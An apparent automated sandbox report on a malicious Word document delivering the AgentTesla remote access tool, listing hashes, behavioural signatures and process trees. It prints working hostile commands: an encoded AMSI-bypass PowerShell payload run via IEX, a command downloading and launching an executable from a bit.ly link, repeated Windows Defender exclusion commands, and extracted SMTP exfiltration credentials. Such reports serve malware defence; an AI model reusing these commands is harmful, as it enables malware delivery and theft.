Analysis
-
max time kernel
43s -
max time network
121s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-04-2021 06:39
Static task
static1
Behavioral task
behavioral1
Sample
new_order20210408_14.doc
Resource
win7v20201028
General
-
Target
new_order20210408_14.doc
-
Size
824KB
-
MD5
fe54df1ab8565835d83177d1d03e2dd0
-
SHA1
153439d8a1edb4c3dea9fdb78c910dbb107abd58
-
SHA256
27cb289230f6544ef667488a02ee6967b9f1c4cf0c9a4c4d57af8a374b2241d9
-
SHA512
709e8104545ee5839d29d4b766ce0186101f65d1863100b6af54f7a4e4761d2a3cb3ca2e790e7772f452a9fb397f20391cc49d5c47841c11124c8e6fafe1931f
Malware Config
Extracted
http://bit.ly/2RhLurR
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
m4ximilia@yandex.com - Password:
x103860*&1333
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 528 2168 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4416 1176 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4320 2984 powershell.exe EXCEL.EXE -
AgentTesla Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2920-1049-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 25 528 powershell.exe 26 528 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
99864.exe99864.exe99864.exepid process 4372 99864.exe 2684 99864.exe 3168 99864.exe -
Processes:
99864.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe = "0" 99864.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\99864.exe = "0" 99864.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 99864.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 99864.exe -
Drops file in Program Files directory 2 IoCs
Processes:
99864.exedescription ioc process File created C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 99864.exe File opened for modification C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 99864.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4968 2684 WerFault.exe 99864.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEEXCEL.EXEexcelcnv.exeEXCEL.EXEWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 excelcnv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString excelcnv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz excelcnv.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4316 timeout.exe -
Enumerates system info in registry 2 TTPs 15 IoCs
Processes:
EXCEL.EXEEXCEL.EXEWINWORD.EXEEXCEL.EXEexcelcnv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily excelcnv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU excelcnv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS excelcnv.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4640 WINWORD.EXE 4640 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 528 powershell.exe 528 powershell.exe 528 powershell.exe 4416 powershell.exe 4416 powershell.exe 4416 powershell.exe 4320 powershell.exe 4320 powershell.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4968 WerFault.exe 4320 powershell.exe 4320 powershell.exe 884 powershell.exe 884 powershell.exe 1000 powershell.exe 1000 powershell.exe 4160 powershell.exe 4160 powershell.exe 1000 powershell.exe 4160 powershell.exe 884 powershell.exe 1000 powershell.exe 884 powershell.exe 4160 powershell.exe 4756 powershell.exe 4756 powershell.exe 3100 powershell.exe 3100 powershell.exe 4104 powershell.exe 4104 powershell.exe 4756 powershell.exe 4104 powershell.exe 3100 powershell.exe 4756 powershell.exe 4104 powershell.exe 3100 powershell.exe 4792 powershell.exe 4792 powershell.exe 1272 powershell.exe 1272 powershell.exe 1068 powershell.exe 1068 powershell.exe 1272 powershell.exe 2208 powershell.exe 2208 powershell.exe 2024 powershell.exe 2024 powershell.exe 4792 powershell.exe 2300 powershell.exe 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowershell.exe99864.exepowershell.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeDebugPrivilege 4372 99864.exe Token: SeDebugPrivilege 4320 powershell.exe Token: SeRestorePrivilege 4968 WerFault.exe Token: SeBackupPrivilege 4968 WerFault.exe Token: SeDebugPrivilege 4968 WerFault.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeDebugPrivilege 4160 powershell.exe Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
WINWORD.EXEEXCEL.EXEEXCEL.EXEEXCEL.EXEexcelcnv.exepid process 4640 WINWORD.EXE 4640 WINWORD.EXE 4640 WINWORD.EXE 2168 EXCEL.EXE 2168 EXCEL.EXE 2168 EXCEL.EXE 2168 EXCEL.EXE 1176 EXCEL.EXE 1176 EXCEL.EXE 1176 EXCEL.EXE 1176 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 3284 excelcnv.exe 4640 WINWORD.EXE 4640 WINWORD.EXE 4640 WINWORD.EXE 4640 WINWORD.EXE -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
EXCEL.EXEpowershell.exeEXCEL.EXEpowershell.exeEXCEL.EXE99864.exepowershell.exe99864.exedescription pid process target process PID 2168 wrote to memory of 528 2168 EXCEL.EXE powershell.exe PID 2168 wrote to memory of 528 2168 EXCEL.EXE powershell.exe PID 528 wrote to memory of 4372 528 powershell.exe 99864.exe PID 528 wrote to memory of 4372 528 powershell.exe 99864.exe PID 528 wrote to memory of 4372 528 powershell.exe 99864.exe PID 1176 wrote to memory of 4416 1176 EXCEL.EXE powershell.exe PID 1176 wrote to memory of 4416 1176 EXCEL.EXE powershell.exe PID 4416 wrote to memory of 2684 4416 powershell.exe 99864.exe PID 4416 wrote to memory of 2684 4416 powershell.exe 99864.exe PID 4416 wrote to memory of 2684 4416 powershell.exe 99864.exe PID 2984 wrote to memory of 4320 2984 EXCEL.EXE powershell.exe PID 2984 wrote to memory of 4320 2984 EXCEL.EXE powershell.exe PID 4372 wrote to memory of 884 4372 99864.exe powershell.exe PID 4372 wrote to memory of 884 4372 99864.exe powershell.exe PID 4372 wrote to memory of 884 4372 99864.exe powershell.exe PID 4372 wrote to memory of 1000 4372 99864.exe powershell.exe PID 4372 wrote to memory of 1000 4372 99864.exe powershell.exe PID 4372 wrote to memory of 1000 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4160 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4160 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4160 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4756 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4756 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4756 4372 99864.exe powershell.exe PID 4372 wrote to memory of 3100 4372 99864.exe powershell.exe PID 4372 wrote to memory of 3100 4372 99864.exe powershell.exe PID 4372 wrote to memory of 3100 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4104 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4104 4372 99864.exe powershell.exe PID 4372 wrote to memory of 4104 4372 99864.exe powershell.exe PID 4320 wrote to memory of 3168 4320 powershell.exe 99864.exe PID 4320 wrote to memory of 3168 4320 powershell.exe 99864.exe PID 4320 wrote to memory of 3168 4320 powershell.exe 99864.exe PID 3168 wrote to memory of 4792 3168 99864.exe powershell.exe PID 3168 wrote to memory of 4792 3168 99864.exe powershell.exe PID 3168 wrote to memory of 4792 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1272 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1272 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1272 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1068 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1068 3168 99864.exe powershell.exe PID 3168 wrote to memory of 1068 3168 99864.exe powershell.exe PID 4372 wrote to memory of 2208 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2208 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2208 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2024 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2024 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2024 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2300 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2300 4372 99864.exe powershell.exe PID 4372 wrote to memory of 2300 4372 99864.exe powershell.exe PID 3168 wrote to memory of 5808 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5808 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5808 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5856 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5856 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5856 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5920 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5920 3168 99864.exe powershell.exe PID 3168 wrote to memory of 5920 3168 99864.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\new_order20210408_14.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2RhLurR ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\99864.exe"C:\Users\Admin\AppData\Local\Temp\99864.exe"3⤵
- Executes dropped EXE
- Windows security modification
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe" -Force4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\99864.exe"C:\Users\Admin\AppData\Local\Temp\99864.exe"4⤵
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,